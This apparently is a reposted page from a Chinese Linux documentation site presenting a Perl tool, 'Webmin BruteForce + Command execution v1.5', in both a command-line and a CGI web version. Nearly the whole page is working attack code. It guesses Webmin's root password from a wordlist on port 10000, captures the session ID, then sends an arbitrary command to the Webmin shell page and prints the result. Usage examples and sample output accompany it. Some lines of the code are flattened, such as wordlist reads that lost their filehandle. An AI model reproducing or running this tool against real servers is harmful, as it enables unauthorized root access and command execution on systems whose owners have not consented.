Webmin 暴力破解+ 執行命令

←手機掃碼閱讀火星人 @ 2014-03-24 , reply:0

Webmin是一個廣泛使用的，運行在linux/unix下,用瀏覽器來管理系統的工具。用它，你不必知道複雜的命令行，也不用了解各種複雜的配置文件，系統管理變得非常簡單！可以設置帳號，配置DNS和文件共享等． Webmin BruteForce + Command execution v1.5 #!/usr/bin/perl ################################################################################ # Webmin BruteForce + Command execution # v1.0:By Di42lo - _2@012.net.il">DiAblo_2@012.net.il # v1.5:By ZzagorR - zzagorrzzagorr@hotmail.com - www.rootbinbash.com ################################################################################ #add script: #1.wordlist func. #2.log (line:41) ################################################################################ # usage: # ./webmin1.pl #./webmin1.pl 192.168.0.5 "uptime" wordlist.txt # [+] BruteForcing... # [+] trying to enter with: admim # [+] trying to enter with: admin # [+] Found SID : f3231ff32849fa0c8c98487ba8c09dbb # [+] Password : admin # [+] Connecting to host once again # [+] Connected.. Sending Buffer # [+] Buffer sent...running command uptime # root logged into Webmin 1.170 on linux (SuSE Linux 9.1) # 10:55pm up 23 days 9:03, 1 user, load average: 0.20, 0.05, 0.01 ################################################################################ use IO::Socket; if (@ARGV<3){ print "Webmin BruteForcer v1.5\n"; print "usage:\n"; print " webmin15.pl \n"; print "example:\n"; print " webmin15.pl www.abcd.com \"id\" wordlist.txt\n"; exit; } my $host=$ARGV[0]; my $cmd=$ARGV[1]; my $wlist=$ARGV[2]; open (data, "$wlist"); @wordlist=; close data; $passx=@wordlist; open(results , ">$host.log"); print results "#############################\n"; print results "Webmin BruteForce + Command execution v1.5\n"; print results "Host:$host\n"; print results "#############################\n"; my $chk=0; my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 10); if(!$sock){ print "[-] Webmin on this host does not exist\n"; print results "[-] Webmin on this host does not exist\n"; exit; }else{ $sock->close; print "[+] BruteForcing...\n"; } my $sid; $n=0; while ($chk!=1) { $n++; if($n>$passx){ exit; } $pass=@wordlist[$passx-$n]; my $pass_line="page=%2F&user=root&pass=$pass"; my $buffer="POST /session_login.cgi HTTP/1.0\n". "Host: $host:10000\n". "Keep-Alive: 300\n". "Connection: keep-alive\n". "Referer: http://$host:10000/\n". "Cookie: testing=1\n". "Content-Type: application/x-www-form-urlencoded\n". "Content-Length: __\n". "\n". $pass_line."\n\n"; my $line_size=length($pass_line); $buffer=~s/__/$line_size/g; my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 10); if ($sock){ print "[+] trying to enter with: $pass\n"; print $sock $buffer; while ($answer=<$sock>){ if ($answer=~/sid=(.*);/g){ $chk=1; $sid=$1; print "[+] Found SID : $sid\n"; print "[+] Password : $pass\n"; print results "[+]:Password:$pass\nSid:$sid\n"; } } } $sock->close; print results "[-]$pass\n"; } print "[+] Connecting to host once again\n"; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 10); if(!$sock){ print "[-] Cant Connect once again for command execution\n"; print results "[-] Cant Connect once again for command execution\n"; } print "[+] Connected.. Sending Buffer\n"; my $temp="-----------------------------19777347561180971495777867604\n". "Content-Disposition: form-data; name=\"cmd\"\n". "\n". "$cmd\n". "-----------------------------19777347561180971495777867604\n". "Content-Disposition: form-data; name=\"pwd\"\n". "\n". "/root\n". "-----------------------------19777347561180971495777867604\n". "Content-Disposition: form-data; name=\"history\"\n". "\n". "\n". "-----------------------------19777347561180971495777867604\n". "Content-Disposition: form-data; name=\"previous\"\n". "\n". "$cmd\n". "-----------------------------19777347561180971495777867604\n". "Content-Disposition: form-data; name=\"pcmd\"\n". "\n". "$cmd\n". "-----------------------------19777347561180971495777867604--\n\n"; my $buffer_size=length($temp); $buffer="POST /shell/index.cgi HTTP/1.1\n". "Host: $host:10000\n". "Keep-Alive: 300\n". "Connection: keep-alive\n". "Referer: http://$host:10000/shell/\n". "Cookie: sid=$sid\; testing=1; x\n". "Content-Type: multipart/form-data; boundary=---------------------------19777347561180971495777867604\n". "Content-Length: siz\n". "\n". $temp; $buffer=~s/siz/$buffer_size/g; print $sock $buffer; if ($sock){ print "[+] Buffer sent...running command $cmd\n"; print $sock $buffer; while ($answer=<$sock>){ if ($answer=~/defaultStatus="(.*)";/g) { print $1."\n";} if ($answer=~/

>/g){  $cmd_chk=1;  }  if ($cmd_chk==1) {  if ($answer=~/<\/pre><\/td><\/tr>/g){  exit;  } else {  print $answer;  print results "[+]$answer\n";  }  }  }  }  #!/usr/bin/perl    use CGI qw(:standard);  use IO::Socket;  $CGI::HEADERS_ONCE = 1;  $CGI = new CGI;    $atak = $CGI->param("atak");  $host = $CGI->param("host");  $wlist = $CGI->param("wlist");  $cmd = $CGI->param("cmd");    print $CGI->header(-type=>'text/html',-charset=>'windows-1254');  print qq~Webmin Web Brute Force v1.5 - cgi  versiyon  Webmin Web Brute Force v1.5 - cgi versiyon
    Webmin BruteForce + Command execution- cgi version
  v1.0:By Di42lo - _2@012.net.ilDiAblo_2@012.net.il
  v1.5:By ZzagorR - zzagorrzzagorr@hotmail.com - www.rootbinbash.com
  ~;  if($atak eq "webmin") {  open (data, "$wlist");  @wordlist=;  close data;  $passx=@wordlist;  $chk=0;  $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host",  PeerPort => "10000",Timeout => 25) || die "[-] Webmin on this host does not  exist\r\n";  $sock->close;  print "[+] BruteForcing...
";  $sid;  $n=0;  while ($chk!=1) {  $n++;  if($n>$passx){  exit;  }  $pass=@wordlist[$passx-$n];  $pass_line="page=%2F&user=root&pass=$pass";  $buffer="POST /session_login.cgi HTTP/1.0\n".  "Host: $host:10000\n".  "Keep-Alive: 300\n".  "Connection: keep-alive\n".  "Referer: http://$host:10000/\n".  "Cookie: testing=1\n".  "Content-Type: application/x-www-form-urlencoded\n".  "Content-Length: __\n".  "\n".  $pass_line."\n\n";  $line_size=length($pass_line);  $buffer=~s/__/$line_size/g;  $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host",  PeerPort => "10000",Timeout => 25);  if ($sock){  print "[+] Denenen sifre: $pass
";  print $sock $buffer;  while ($answer=<$sock>){  if ($answer=~/sid=(.*);/g){  $chk=1;  $sid=$1;  print "[+] Found SID : $sid
";  print "[+] Sifre : $pass
";  }  }  }  $sock->close;  }  print "[+] Connecting to host once again
";  $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort  => "10000",Timeout => 10) || die "[-] Cant Connect once again for command  execution\n";  print "[+] Connected.. Sending Buffer
";  $temp="-----------------------------19777347561180971495777867604\n".  "Content-Disposition: form-data; name=\"cmd\"\n".  "\n".  "$cmd\n".  "-----------------------------19777347561180971495777867604\n".  "Content-Disposition: form-data; name=\"pwd\"\n".  "\n".  "/root\n".  "-----------------------------19777347561180971495777867604\n".  "Content-Disposition: form-data; name=\"history\"\n".  "\n".  "\n".  "-----------------------------19777347561180971495777867604\n".  "Content-Disposition: form-data; name=\"previous\"\n".  "\n".  "$cmd\n".  "-----------------------------19777347561180971495777867604\n".  "Content-Disposition: form-data; name=\"pcmd\"\n".  "\n".  "$cmd\n".  "-----------------------------19777347561180971495777867604--\n\n";  $buffer_size=length($temp);  $buffer="POST /shell/index.cgi HTTP/1.1\n".  "Host: $host:10000\n".  "Keep-Alive: 300\n".  "Connection: keep-alive\n".  "Referer: http://$host:10000/shell/\n".  "Cookie: sid=$sid\; testing=1; x\n".  "Content-Type: multipart/form-data;  boundary=---------------------------19777347561180971495777867604\n".  "Content-Length: siz\n".  "\n".  $temp;  $buffer=~s/siz/$buffer_size/g;  print $sock $buffer;    if ($sock){  print "[+] Buffer sent...running command $cmd
";  print $sock $buffer;  while ($answer=<$sock>){  if ($answer=~/defaultStatus="(.*)";/g) { print $1."
";}  if ($answer=~/>/g){  $cmd_chk=1;  }  if ($cmd_chk==1) {  if ($answer=~/<\/pre><\/td><\/tr>/g){  exit;  } else {  print $answer;  }  }  }  }  }    if($atak eq ""){  print qq~  
  Webmin Web Brute Force v1.5 - cgi  version
  Server: 
  Wordlist: Examples:
---------
admin
administrator
redhat
mandrake
suse
  Cmd: 
  
  
~;

Tags: linux system 系統

使用Linux L2TP/IPsec VPN 伺服器

saltstack，windows客戶端遠程執行問題

關於使用expect編程遇到的疑問

expect在執行命令返回結果中，有時候只返回一些結果，並卡住

ssh自動登錄伺服器並執行一條命令取得返回結果後退出

如何使用BackTrack破解WIFI的WEP密鑰

利用fail2ban阻止ssh暴力破解密碼

FENCE_IPMILAN執行REBOOT操作，機器確下電

實用的一行Linux命令

OpenSSH 伺服器的 20 個最佳實踐

FreeBSD下構建安全的Web伺服器

virtualbox的新功能「支持從host 系統執行 guest 應用程序」？

[轉]FreeBSD下構建安全的Web伺服器

構建安全的apache+mysql+php的web伺服器

top命令詳解 .

RedFlag 6 sp2 下無線破解2(aircrack-ng)

用dos命令破解網吧限制的方法和dos命令全集[color]

postfix郵件伺服器執行telnet localhost 25卡在Escape character is '^]'不動了

Webmin:Unix上的GUI管理工具(二)

Linux下webmin的ssl加密管理

webmin,非常棒的Linux管理工具

Linux下chkconfig命令詳解

只需十分鐘 Linux環境下快速搭建維基網站

RTX破解修改方法

安裝apache執行./configure時報告如下錯無

一條命令的魅力

Webmin 暴力破解+ 執行命令

命令行方式下的列印操作

您的Java代碼安全嗎—還是暴露在外？

用Ubuntu破解WEP密鑰

[火星人 ] Webmin 暴力破解+ 執行命令已經有717次圍觀

本文地址：http://coctec.com/docs/linux/show-post-136664.html

Webmin 暴力破解+ 執行命令

熱門文章

最新文章

Webmin Web Brute Force v1.5 - cgi version
Server:
Wordlist:		Examples: --------- admin administrator redhat mandrake suse
Cmd: